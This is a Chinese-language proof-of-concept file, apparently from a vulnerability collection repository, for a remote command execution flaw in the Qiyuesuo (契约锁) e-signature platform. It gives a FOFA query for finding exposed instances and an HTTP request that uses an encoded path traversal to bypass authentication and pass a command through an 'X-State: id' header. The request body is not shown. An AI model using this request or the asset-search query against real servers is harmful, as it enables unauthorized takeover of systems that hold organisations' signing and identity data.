POC/wpoc/契约锁/契约锁template存在远程命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

32 lines
11 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 契约锁template存在远程命令执行漏洞
# 一、漏洞简介
Qiyuesuo是一款数字化可信基础服务平台为组织提供“数字身份、电子签章、印章管控以及数据存证服务”于一体的数字化可信基础解决方案。Qiyuesuo存在前台代码执行漏洞攻击者可构造恶意请求绕过相关认证调用后台功能造成远程代码执行控制服务器。
# 二、影响版本
+ 契约锁
# 三、资产测绘
+ fofa`app="契约锁-电子签署平台"`
+ 特征
![1717569204388-1722148f-4f83-4ad5-83a5-33896b546916.png](./img/hnHfwvjyibiVjOX0/1717569204388-1722148f-4f83-4ad5-83a5-33896b546916-245916.png)
# 四、漏洞复现
```http
POST /login/%2e%2e/template/html/add HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/json
X-State: id
Content-Length: 9839
```
![1717569277304-dc19df2a-f96e-430a-9212-e1516fb149ed.png](./img/hnHfwvjyibiVjOX0/1717569277304-dc19df2a-f96e-430a-9212-e1516fb149ed-540709.png)
> 更新: 2024-06-17 09:34:03
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oul2pitgap61ihk3>